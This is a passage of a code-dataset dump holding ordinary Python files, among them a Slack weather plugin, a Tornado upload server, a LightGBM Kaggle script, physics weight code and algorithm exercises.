forecasts.append({\n \"title\": day_of_wk,\n \"value\": u\"{} {}°{}\".format(icon, day[\"high\"], unit),\n \"short\": True,\n })\n\n return title, forecasts\n\ndef on_message(msg, server):\n text = msg.get(\"text\", \"\")\n match = re.findall(r\"!weather (.*)\", text)\n if not match:\n return\n\n try:\n title, forecasts = weather(match[0])\n except WeatherException as err:\n return err.args[0]\n\n attachment = {\n \"fallback\": title,\n \"pretext\": title,\n \"fields\": forecasts[0:4]\n }\n server.slack.post_message(\n msg['channel'],\n '',\n as_user=server.slack.username,\n attachments=json.dumps([attachment]))\n\non_bot_message = on_message\n","sub_path":"limbo/plugins/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"590742441","text":"import os\r\nimport math\r\n\r\ndef main():\r\n theRange = int(input())\r\n if theRange < 3 or theRange%2!=1:\r\n print(\"Range must bigger than 2 or must be odd\")\r\n stop()\r\n startingPoint = int(input())\r\n if(startingPoint > 4 or startingPoint < 0):\r\n print(\"startingPoint must less than 5 and bigger than -1\")\r\n stop()\r\n arr = [[] for i in range(theRange)]\r\n for x in arr:\r\n str = input()\r\n x.extend(list(str))\r\n if len(x) != theRange:\r\n print(\"must be {0} numbers\".format(theRange))\r\n stop()\r\n record = \"\"\r\n x = len(arr)//2\r\n y = len(arr[x])//2\r\n z = 1\r\n record += arr[x][y]\r\n direction = 4 #4=>left 8=>top 6=>right 2=>down\r\n if startingPoint == 0:\r\n direction = 4\r\n elif startingPoint == 1:\r\n direction = 8\r\n elif startingPoint == 2:\r\n direction = 6\r\n elif startingPoint == 3:\r\n direction = 2\r\n\r\n while 1:\r\n for j in range(2):\r\n for k in range(z):\r\n try:\r\n if direction==4:\r\n y = y-1\r\n elif direction==8:\r\n x = x-1\r\n elif direction==6:\r\n y = y+1\r\n elif direction==2:\r\n x = x+1\r\n if(x<0 or y<0):\r\n raise IndexError()\r\n record += arr[x][y]\r\n except IndexError:\r\n print(record)\r\n stop()\r\n \r\n if direction==4:\r\n direction =8\r\n elif direction==8:\r\n direction = 6\r\n elif direction==6:\r\n direction = 2\r\n elif direction==2:\r\n direction = 4\r\n z = z+1\r\n \r\n print(record)\r\n \r\ndef stop():\r\n os.system(\"pause\")\r\n exit()\r\n \r\nmain()\r\n","sub_path":"programming language/homework2.py","file_name":"homework2.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"430123603","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom typing import Union\n\nimport oneflow as flow\nfrom oneflow.framework.tensor import register_tensor_op\n\n\n@register_tensor_op(\"tile\")\ndef tile_op(input, reps):\n \"\"\"The interface is consistent with PyTorch.\n The documentation is referenced from:\n https://pytorch.org/docs/stable/generated/torch.tile.html\n\n Constructs a tensor by repeating the elements of ``input``. The ``reps`` argument specifies the number\n of repetitions in each dimension.\n\n If ``reps`` specifies fewer dimensions than ``input`` has, then ones are prepended to ``reps`` until\n all dimensions are specified. For example, if ``input`` has shape (8, 6, 4, 2) and ``reps`` is (2, 2),\n then ``reps`` is treated as (1, 1, 2, 2).\n\n Analogously, if ``input`` has fewer dimensions than ``reps`` specifies, then ``input`` is treated as\n if it were unsqueezed at dimension zero until it has as many dimensions as ``reps`` specifies.\n For example, if ``input`` has shape (4, 2) and ``reps`` is (3, 3, 2, 2), then ``input`` is treated as\n if it had the shape (1, 1, 4, 2).\n\n .. note::\n This function is similar to NumPy’s tile function.\n\n Args:\n input (oneflow.Tensor): the tensor whose elements to repeat.\n reps (tuple): the number of repetitions per dimension.\n\n For example:\n\n .. code-block:: python\n\n >>> import oneflow as flow\n >>> import numpy as np\n \n >>> x = np.array([1, 2]).astype(np.int32)\n >>> input = flow.tensor(x, dtype=flow.int32)\n >>> out = input.tile(reps=(2,))\n >>> out\n tensor([1, 2, 1, 2], dtype=oneflow.int32)\n\n >>> x = np.random.randn(5, 2, 1)\n >>> input = flow.Tensor(x)\n >>> out = input.tile(reps=(3, 4))\n >>> out.size()\n oneflow.Size([5, 6, 4])\n\n \"\"\"\n\n for s in reps:\n assert s > 0\n input_shape = input.shape\n diff = len(input_shape) - len(reps)\n if diff > 0:\n shape = [1 for _ in range(diff)]\n shape.extend([i for i in reps])\n reps = tuple(shape)\n return input.repeat(reps)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(raise_on_error=True)\n","sub_path":"python/oneflow/nn/modules/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"639121388","text":"import tornado\nimport tornado.ioloop\nimport tornado.web\nimport os\nimport uuid\n\n__UPLOADS__ = \"uploads/\"\n\n\nclass Userform(tornado.web.RequestHandler):\n\n def get(self):\n self.render(\"upload.html\")\n\n\nclass Upload(tornado.web.RequestHandler):\n\n def post(self):\n fileinfo = self.request.files['filearg'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(__UPLOADS__ + cname, 'wb')\n fh.write(fileinfo['body'])\n link = \"{name}\".format(name=cname)\n self.finish(link)\n\n\napplication = tornado.web.Application([\n (r\"/\", Userform),\n (r\"/upload\", Upload),\n (r\"/uploads/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"uploads\"}),\n], debug=True)\n\n\nif __name__ == \"__main__\":\n application.listen(8000)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"01-tornado-file-upload-2/app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615367991","text":"from userlib import BSTree\n\n\"\"\"\nProblem 33:\nGiven a Binary Tree, find vertical sum of the nodes that are in same vertical line. Print all sums through different vertical lines.\n\nExamples:\n\n 1\n / \\\n 2 3\n / \\ / \\\n4 5 6 7\nThe tree has 5 vertical lines\n\nVertical-Line-1 has only one node 4 => vertical sum is 4\nVertical-Line-2: has only one node 2=> vertical sum is 2\nVertical-Line-3: has three nodes: 1,5,6 => vertical sum is 1+5+6 = 12\nVertical-Line-4: has only one node 3 => vertical sum is 3\nVertical-Line-5: has only one node 7 => vertical sum is 7\n\nSo expected output is 4, 2, 12, 3 and 7\n\nSolution:\nWe need to check the Horizontal Distances from root for all nodes. If two nodes have the same Horizontal Distance (HD), then they are on same vertical line.\nThe idea of HD is simple. HD for root is 0, a right edge (edge connecting to right subtree) is considered as +1 horizontal distance and a left edge\nis considered as -1 horizontal distance.\n\nWe hash the HD\n\"\"\"\n\nhash_table = {}\n\n\ndef find_vertical_sum(root, column):\n if root is None:\n return\n if column not in hash_table:\n hash_table[column] = 0\n hash_table[column] += root.get_data()\n find_vertical_sum(root.get_left(), column - 1)\n find_vertical_sum(root.get_right(), column + 1)\n\n return hash_table\n\nif __name__ == '__main__':\n b = [10, 5, 15, 2, 6, 16, 11]\n a = BSTree(*b)\n print(find_vertical_sum(a.root, 0))","sub_path":"karumanchi/Trees/vertical_sum.py","file_name":"vertical_sum.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324447628","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 6 20:58:07 2018\n\n@author: kazuki.onodera\n\nnohup python -u 912_predict_807-1.py 0 > LOG/log_912_predict_807-1_s0.py.txt &\nnohup python -u 912_predict_807-1.py 1 > LOG/log_912_predict_807-1_s1.py.txt &\nnohup python -u 912_predict_807-1.py 2 > LOG/log_912_predict_807-1_s2.py.txt &\nnohup python -u 912_predict_807-1.py 3 > LOG/log_912_predict_807-1_s3.py.txt &\nnohup python -u 912_predict_807-1.py 4 > LOG/log_912_predict_807-1_s4.py.txt &\nnohup python -u 912_predict_807-1.py 5 > LOG/log_912_predict_807-1_s5.py.txt &\nnohup python -u 912_predict_807-1.py 6 > LOG/log_912_predict_807-1_s6.py.txt &\nnohup python -u 912_predict_807-1.py 7 > LOG/log_912_predict_807-1_s7.py.txt &\nnohup python -u 912_predict_807-1.py 8 > LOG/log_912_predict_807-1_s8.py.txt &\nnohup python -u 912_predict_807-1.py 9 > LOG/log_912_predict_807-1_s9.py.txt &\n\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport gc, os\nfrom collections import defaultdict\nimport sys\nsys.path.append(f'/home/{os.environ.get(\"USER\")}/PythonLibrary')\nimport lgbextension as ex\nimport lightgbm as lgb\nfrom multiprocessing import cpu_count\nfrom glob import glob\nimport utils, utils_cat, utils_best\nutils.start(__file__)\n#==============================================================================\nprint(sys.argv)\nSEED = int(sys.argv[1])\n\nLOOP = 20\n\nNROUND = 4500\n\nSUBMIT_FILE_PATH = f'../output/807-1_s{SEED}.csv.gz'\n\nCOMMENT = f'LB804 (seed87 loop100)'\n\nEXE_SUBMIT = False\n\nparam = {\n 'objective': 'binary',\n 'metric': 'auc',\n 'learning_rate': 0.01,\n 'max_depth': 6,\n 'num_leaves': 63,\n 'max_bin': 255,\n \n 'min_child_weight': 10,\n 'min_data_in_leaf': 150,\n 'reg_lambda': 0.5, # L2 regularization term on weights.\n 'reg_alpha': 0.5, # L1 regularization term on weights.\n \n 'colsample_bytree': 0.9,\n 'subsample': 0.9,\n# 'nthread': 32,\n 'nthread': cpu_count(),\n 'bagging_freq': 1,\n 'verbose':-1,\n# 'seed': SEED\n }\n\n\nnp.random.seed(SEED)\n\nloader = utils_best.Loader('LB804')\n\n# =============================================================================\n# load\n# =============================================================================\n\nX_train = loader.train()\ny_train = utils.read_pickles('../data/label').TARGET\n\n\nif X_train.columns.duplicated().sum()>0:\n raise Exception(f'duplicated!: { X_train.columns[X_train.columns.duplicated()] }')\nprint('no dup :) ')\nprint(f'X_train.shape {X_train.shape}')\n\ngc.collect()\n\nCAT = list( set(X_train.columns) & set(loader.category()) )\n\nCOL = X_train.columns.tolist()\n\nX_test = loader.test()[COL]\n\n\n\n# =============================================================================\n# training\n# =============================================================================\ndtrain = lgb.Dataset(X_train, y_train, categorical_feature=CAT )\n\nmodels = []\nfor i in range(LOOP):\n print(f'LOOP: {i}')\n gc.collect()\n param.update({'seed':np.random.randint(9999)})\n model = lgb.train(param, dtrain, NROUND,\n categorical_feature=CAT)\n# model.save_model(f'lgb{i}.model')\n models.append(model)\n\nimp = ex.getImp(models)\nimp.to_csv(f'LOG/imp_{__file__}.csv', index=False)\n\n# =============================================================================\n# predict\n# =============================================================================\nsub = pd.read_pickle('../data/sub.p')\n\ngc.collect()\n\nlabel_name = 'TARGET'\n\nsub[label_name] = 0\nfor model in models:\n y_pred = model.predict(X_test)\n sub[label_name] += pd.Series(y_pred).rank()\nsub[label_name] /= LOOP\nsub[label_name] /= sub[label_name].max()\nsub['SK_ID_CURR'] = sub['SK_ID_CURR'].map(int)\n\nsub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')\n\nprint(sub[label_name].describe())\n\n\n# =============================================================================\n# submission\n# =============================================================================\nif EXE_SUBMIT:\n print('submit')\n utils.submit(SUBMIT_FILE_PATH, COMMENT)\n\n#==============================================================================\nutils.end(__file__)\n\nos.system(f'nohup python -u 913_predict_807-2.py {SEED} > LOG/log_913_predict_807-2_s{SEED}.py.txt &')\n\n\n","sub_path":"Kaggle/Playgroud/RiskPrediction/Home-Credit-Default-Risk-master/py/trash/912_predict_807-1.py","file_name":"912_predict_807-1.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"87468449","text":"__author__ = 'dogiko'\n\nimport random\nimport math\n\ndef dogiko_random_int(minimun, maximun, left_closed_bool, right_closed_bool): # 回傳範圍內的整數值, 後二碼定義區間開閉\n a = 0\n b = -1\n if minimun % 1 == 0:\n if left_closed_bool:\n a = minimun\n else:\n a = minimun + 1\n else:\n print(\"minimum should be integer !!\")\n\n if maximun % 1 == 0:\n if right_closed_bool:\n b = maximun\n else:\n b = maximun - 1\n\n else:\n print(\"maximun should be integer !!\")\n\n if b < a:\n print(\"we can't pick int from empty set (maxi < mini ?)\")\n else:\n return random.randint(a, b)\n\n\ndef icon_combo_line_left(working_icon_id, wild_work_bool, wilds_id, icons_on_line): # line左連線專用, 給定規則後回傳指定線上的combo數\n ans = 0\n icon_hit_on_line = []\n for r in range(len(icons_on_line)): # 判定每個位置是否命中\n icon_hit_on_line.append(\n (icons_on_line[r] == working_icon_id) or (wild_work_bool and (icons_on_line[r] in wilds_id)))\n\n for r in range(len(icons_on_line)):\n if icon_hit_on_line[r]:\n ans += 1\n else:\n break\n\n return ans\n\n\ndef icon_combo_scatter_count(working_icon_id, wild_work_bool, wilds_id, icons_appearing_on_reels): # 算個數scatter專用,\n ans = 0\n for r in range(len(icons_appearing_on_reels)): # 計算銀幕上出現的個數\n for p in range(len(icons_appearing_on_reels[r])):\n ans += ((icons_appearing_on_reels[r][p] == working_icon_id) or (\n wild_work_bool and (icons_appearing_on_reels[r][p] in wilds_id)))\n\n return ans\n\n\ndef confidence_level(standard_deviation, workout_mean, theoretically_mean = 0): #輸入標準差, 統計平均, 理論平均(預設0) 回傳信心水準\n error = abs(workout_mean - theoretically_mean)/standard_deviation\n turn = 0\n turn += error\n res = 0\n for i in range(10000):\n res += turn/(2*i+1)\n turn *= -(error**2)/(2*(i+1))\n\n return 2*res/math.sqrt(2*math.pi)\n","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51316299","text":"from plugin import db_tools\n\nmongo = db_tools.use_mongo()\n\n\ndef is_participate_white(bot, update, specfic=None):\n if specfic:\n chat_id, user_id = specfic\n else:\n chat_id = update.message.chat.id\n user_id = update.message.from_user.id\n query = {'chat.id': chat_id, 'chat.white_participate': {'$in': [user_id]}}\n return bool(mongo.group.find_one(query))\n","sub_path":"plugin/is_participate_white.py","file_name":"is_participate_white.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"582399590","text":"# Copyright (c) 2013 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\" Utilities for ChromeOS build steps. \"\"\"\n\nfrom flavor_utils.ssh_build_step_utils import SshBuildStepUtils\nfrom slave import slave_utils\nfrom py.utils import shell_utils\nimport os\n\n\nclass ChromeosBuildStepUtils(SshBuildStepUtils):\n def __init__(self, build_step_instance):\n SshBuildStepUtils.__init__(self, build_step_instance)\n self._remote_dir = '/usr/local/skiabot'\n systemtype = 'chromeos-' + self._step.args['board']\n self._build_dir = os.path.join('out', 'config', systemtype)\n\n def Compile(self, target):\n \"\"\" Compile the Skia executables. \"\"\"\n # Add gsutil to PATH\n gsutil = slave_utils.GSUtilSetup()\n os.environ['PATH'] += os.pathsep + os.path.dirname(gsutil)\n\n # Run the chromeos_make script.\n make_cmd = os.path.join('platform_tools', 'chromeos', 'bin',\n 'chromeos_make')\n cmd = [make_cmd,\n '-d', self._step.args['board'],\n target,\n 'BUILDTYPE=%s' % self._step.configuration,\n ]\n\n cmd.extend(self._step.default_make_flags)\n cmd.extend(self._step.make_flags)\n shell_utils.run(cmd)\n","sub_path":"slave/skia_slave_scripts/flavor_utils/chromeos_build_step_utils.py","file_name":"chromeos_build_step_utils.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192734208","text":"'''\n\n480. Sliding Window Median\n\nMedian is the middle value in an ordered integer list. If the size of the list is even, there is no middle value. So the median is the mean of the two middle value.\n\nExamples:\n[2,3,4] , the median is 3\n\n[2,3], the median is (2 + 3) / 2 = 2.5\n\nGiven an array nums, there is a sliding window of size k which is moving from the very left of the array to the very right. You can only see the k numbers in the window. Each time the sliding window moves right by one position. Your job is to output the median array for each window in the original array.\n\nFor example,\nGiven nums = [1,3,-1,-3,5,3,6,7], and k = 3.\n\nWindow position Median\n--------------- -----\n[1 3 -1] -3 5 3 6 7 1\n 1 [3 -1 -3] 5 3 6 7 -1\n 1 3 [-1 -3 5] 3 6 7 -1\n 1 3 -1 [-3 5 3] 6 7 3\n 1 3 -1 -3 [5 3 6] 7 5\n 1 3 -1 -3 5 [3 6 7] 6\nTherefore, return the median sliding window as [1,-1,-1,3,5,6].\n\nNote:\nYou may assume k is always valid, ie: k is always smaller than input array's size for non-empty array.\nAnswers within 10^-5 of the actual value will be accepted as correct.\n\n'''\n\n# 2020/06/10, two heaps\n\n'''\nRuntime: 276 ms, faster than 51.34% of Python3 online submissions for Sliding Window Median.\nMemory Usage: 15.7 MB, less than 32.37% of Python3 online submissions for Sliding Window Median.\n'''\n\n\nclass Solution:\n def medianSlidingWindow(self, nums: List[int], k: int) -> List[float]:\n ans = []\n # min_heap: large nums\n # max_heap: small nums\n min_heap = nums[:k]\n heapq.heapify(min_heap)\n max_heap = []\n half = k // 2 + 1 if k & 1 else k // 2\n for i in range(half):\n heapq.heappush(max_heap, -heapq.heappop(min_heap))\n ans.append(self.get_median(max_heap, min_heap, k))\n del_nums = collections.defaultdict(int)\n for r in range(k, len(nums)):\n to_be_deleted = nums[r - k]\n in_num = nums[r]\n del_nums[to_be_deleted] += 1\n if in_num <= -max_heap[0]:\n heapq.heappush(max_heap, -in_num)\n if to_be_deleted > -max_heap[0]:\n self.rebalance(max_heap, min_heap)\n else:\n heapq.heappush(min_heap, in_num)\n if to_be_deleted <= -max_heap[0]:\n self.rebalance(min_heap, max_heap)\n self.check_valid(del_nums, max_heap, min_heap)\n ans.append(self.get_median(max_heap, min_heap, k))\n return ans\n\n def rebalance(self, from_heap, to_heap):\n heapq.heappush(to_heap, -heapq.heappop(from_heap))\n\n def check_valid(self, del_nums, left, right):\n while del_nums[-left[0]]:\n del_nums[-left[0]] -= 1\n heapq.heappop(left)\n while right and del_nums[right[0]]:\n del_nums[right[0]] -= 1\n heapq.heappop(right)\n\n def get_median(self, left, right, k):\n if k & 1:\n return -left[0]\n return (-left[0] + right[0]) / 2\n","sub_path":"0480. Sliding Window Median.py","file_name":"0480. Sliding Window Median.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547733159","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, api, fields, _\n\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n company_id = fields.Many2one('res.company', 'Company', default=False, help='Company onw of this product')\n\n @api.one\n @api.constrains('name')\n def _check_name(self):\n if self.search([('name', '=', self.name)]):\n msg_error = \"The product Name must be unique.\"\n raise Warning(_(msg_error))\n\n @api.one\n @api.constrains('ean13')\n def _check_name(self):\n if self.ean13:\n if self.search([('ean13', '=', self.ean13)]):\n msg_error = \"The product bar code must be unique.\"\n raise Warning(_(msg_error))\n\n @api.one\n @api.constrains('default_code')\n def _check_name(self):\n if self.default_code:\n if self.search([('default_code', '=', self.default_code)]):\n msg_error = \"The product Code must be unique.\"\n raise Warning(_(msg_error))\n\n\n @api.model\n def create(self, vals):\n vals['company_id'] = False\n data = super(ProductTemplate, self).create(vals)\n return data\n\n @api.multi\n def write(self, vals):\n vals['company_id'] = False\n data = super(ProductTemplate, self).write(vals)\n return data\n","sub_path":"purchase_multicompany/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336460929","text":"import pandas as pd\nfrom alpha_vantage.timeseries import TimeSeries\nimport matplotlib.pyplot as plt\nimport time\n\n#LDQW7564ZBSM8GWH\nts = TimeSeries(\"LDQW7564ZBSM8GWH\", output_format=\"pandas\")\n\ntarget_price = 450\n\nwhile True:\n data, meta_data = ts.get_intraday(symbol=\"TSLA\", interval=\"1min\", outputsize=\"full\")\n\n closing_data = data[\"4. close\"]\n recent_price = closing_data[0]\n if recent_price >= target_price:\n print(\"ALERT | STOCK IS AT: \", recent_price, \" | ALERT\")\n break\n else:\n print(\"PRICE AT: \", recent_price)\n time.sleep(5)","sub_path":"src/alerter.py","file_name":"alerter.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"226028648","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 8 21:07:04 2018\r\n\r\n@author: witat\r\n\"\"\"\r\nimport pandas as pd\r\nimport lightgbm as lgb\r\nimport numpy as np\r\n\r\ntrain = pd.read_csv('C:/Users/witat/Downloads/train.csv')\r\ntest = pd.read_csv('C:/Users/witat/Downloads/test.csv')\r\n\r\nexclude_feature = ['LotFrontage', 'LotArea', 'MasVnrArea',\r\n 'BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF',\r\n 'TotalBsmtSF', '1stFlrSF', '2ndFlrSF',\r\n 'LowQualFinSF', 'GrLivArea', 'GarageArea',\r\n 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch',\r\n '3SsnPorch', 'ScreenPorch', 'MiscVal']\r\n\r\noriginal = ['Id','LotFrontage', 'LotArea', 'MasVnrArea',\r\n 'BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF',\r\n 'TotalBsmtSF', '1stFlrSF', '2ndFlrSF',\r\n 'LowQualFinSF', 'GrLivArea', 'GarageArea',\r\n 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch',\r\n '3SsnPorch', 'ScreenPorch', 'MiscVal']\r\n\r\ntrain_num = train[original]\r\ntest_num = test[original]\r\n\r\ntrain_num.Id = train_num.Id.astype('object')\r\ntest_num.Id = test_num.Id.astype('object')\r\n\r\ndef obj(data, test):\r\n #columns = train.select_dtypes(include=['object']).columns.values.tolist()\r\n columns = data.columns.values.tolist()\r\n columns = columns[1:-1]\r\n \r\n \r\n for column in columns:\r\n data[column] = data[column].fillna('NA')\r\n data[column] = data[column].astype('object')\r\n \r\n test[column] = test[column].fillna('NA')\r\n test[column] = test[column].astype('object')\r\n \r\n x = data.groupby(column).agg({'SalePrice': np.mean})\r\n x.columns = [column + '_mean']\r\n x = x.reset_index()\r\n \r\n x[column] = x[column].astype('object')\r\n data = data.merge(x, on = column, how = 'left')\r\n data = data.drop(columns = [column])\r\n \r\n test = test.merge(x, on = column, how = 'left')\r\n test = test.drop(columns = [column])\r\n \r\n return data, test\r\n\r\ntrain_transform, test_transform = obj(train.drop(columns = exclude_feature),test.drop(columns = exclude_feature))\r\n\r\ntrain_transform.Id = train_transform.Id.astype('object')\r\ntest_transform.Id = test_transform.Id.astype('object')\r\n\r\ntrain = train_num.merge(train_transform, on = 'Id', how = 'left')\r\ntest = test_num.merge(test_transform, on = 'Id', how = 'left')\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Kaggle.py","file_name":"Kaggle.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558860836","text":"'''\nGetting weights + variations for L1 Prefiring, based on:\nhttps://lathomas.web.cern.ch/lathomas/TSGStuff/L1Prefiring/PrefiringMaps_2016and2017/\nCMSSW Producer can be found in:\nhttps://github.com/cms-sw/cmssw/blob/793d75e56fbb6ab0e04069498f91f261c98e1a52/PhysicsTools/PatUtils/plugins/L1ECALPrefiringWeightProducer.cc\nTwiki page:\nhttps://twiki.cern.ch/twiki/bin/viewauth/CMS/L1ECALPrefiringWeightRecipe\n'''\n\nimport os\nimport math\nfrom Analysis.Tools.helpers import getObjFromFile, deltaR\n\nclass L1PrefireWeight:\n def __init__(self, year, syst=0.2):\n if year == 2016:\n self.phEff = getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_photonpt_2016BtoH.root'), 'L1prefiring_photonpt_2016BtoH')\n self.jetEff = getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_jetpt_2016BtoH.root'), 'L1prefiring_jetpt_2016BtoH')\n elif year == 2017:\n self.phEff = getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_photonpt_2017BtoF.root'), 'L1prefiring_photonpt_2017BtoF')\n self.jetEff = getObjFromFile(os.path.expandvars('$CMSSW_BASE/src/Analysis/Tools/data/L1Prefiring/L1prefiring_jetpt_2017BtoF.root'), 'L1prefiring_jetpt_2017BtoF')\n else:\n self.phEff = None\n self.jetEff = None\n\n if self.phEff:\n self.maxPtG = self.phEff.GetYaxis().GetXmax()\n self.maxPtJ = self.jetEff.GetYaxis().GetXmax()\n self.rel_syst = syst\n\n def getWeight(self, photons, jets):\n weight = 1.\n weightUp = 1.\n weightDown = 1.\n overlapIndices = []\n\n for jet in jets:\n if not 2.0 <= abs(jet['eta']) <= 3.0:\n continue\n \n pt_j = jet['pt'] if jet['pt'] < self.maxPtJ else self.maxPtJ - 1.\n if pt_j < 20: continue\n cleanJet = True\n\n # get overlap with photons\n for i,photon in enumerate(photons):\n if deltaR(photon, jet)<0.4:\n cleanJet = False\n overlapIndices.append(i)\n pt_g = photon['pt'] if photon['pt'] < self.maxPtG else self.maxPtG - 1.\n prefRatePh = self.phEff.GetBinContent(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n prefRatePh_stat = self.phEff.GetBinError(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n prefRateJet = self.jetEff.GetBinContent(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n prefRateJet_stat = self.jetEff.GetBinError(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n\n if prefRatePh > prefRateJet:\n prefRate = prefRatePh\n prefRate_stat = prefRatePh_stat\n else:\n prefRate = prefRateJet\n prefRate_stat = prefRateJet_stat\n\n if cleanJet:\n prefRate = self.jetEff.GetBinContent(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n prefRate_stat = self.jetEff.GetBinError(self.jetEff.GetXaxis().FindBin(jet['eta']), self.jetEff.GetYaxis().FindBin(pt_j))\n\n weight *= (1 - prefRate)\n weightUp *= (1 - min(1, prefRate + math.sqrt(prefRate_stat**2 + (self.rel_syst * prefRate)**2) ) )\n weightDown *= (1 - max(0, prefRate - math.sqrt(prefRate_stat**2 + (self.rel_syst * prefRate)**2) ) )\n\n\n for i, photon in enumerate(photons):\n if i not in overlapIndices:\n pt_g = photon['pt'] if photon['pt'] < self.maxPtG else self.maxPtG - 1.\n if pt_g < 20: continue\n prefRatePh = self.phEff.GetBinContent(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n prefRatePh_stat = self.phEff.GetBinError(self.phEff.GetXaxis().FindBin(photon['eta']), self.phEff.GetYaxis().FindBin(pt_g))\n \n weight *= (1 - prefRatePh )\n weightUp *= (1 - min(1, prefRatePh + math.sqrt(prefRatePh_stat**2 + (self.rel_syst * prefRatePh)**2) ) )\n weightDown *= (1 - max(0, prefRatePh - math.sqrt(prefRatePh_stat**2 + (self.rel_syst * prefRatePh)**2) ) )\n\n return weight, weightUp, weightDown\n\n","sub_path":"Tools/python/L1PrefireWeight.py","file_name":"L1PrefireWeight.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"485968969","text":"import socket\nimport threading\n\n\ndef read_sock():\n while True:\n data = sock.recv(1024)\n print(data.decode('utf-8'))\n\n\nserver = ('192.168.31.242', 5050)\nalias = input(\"Your username: \")\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind(('', 0))\nsock.sendto((alias + \" Connect to server\").encode('utf-8'), server)\n\npotik = threading.Thread(target=read_sock)\npotik.start()\n\nwhile True:\n message = input(\"Your message: \")\n sock.sendto(('[' + alias + '] ' + message).encode('utf-8'), server)\n","sub_path":"lectures/threads/messanger/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"322796871","text":"import argparse\nimport sys\nfrom process_info import ProcessInfo\nfrom process_monitor_config import ProcessMonitorConfig\n\n\n# Implements command line Monitor methods\nclass Monitor:\n\n # Parse command line arguments\n def parse_args(self, v_args):\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\n '--config',\n required=True\n )\n return parser.parse_args(v_args)\n\n def run(self, v_args):\n args = self.parse_args(v_args)\n\n pmc = ProcessMonitorConfig(filename=args.config)\n pi = ProcessInfo()\n\n for v in pmc.process_list:\n pi.validate_process_exists(v)\n\n pi = ProcessInfo() # Reset 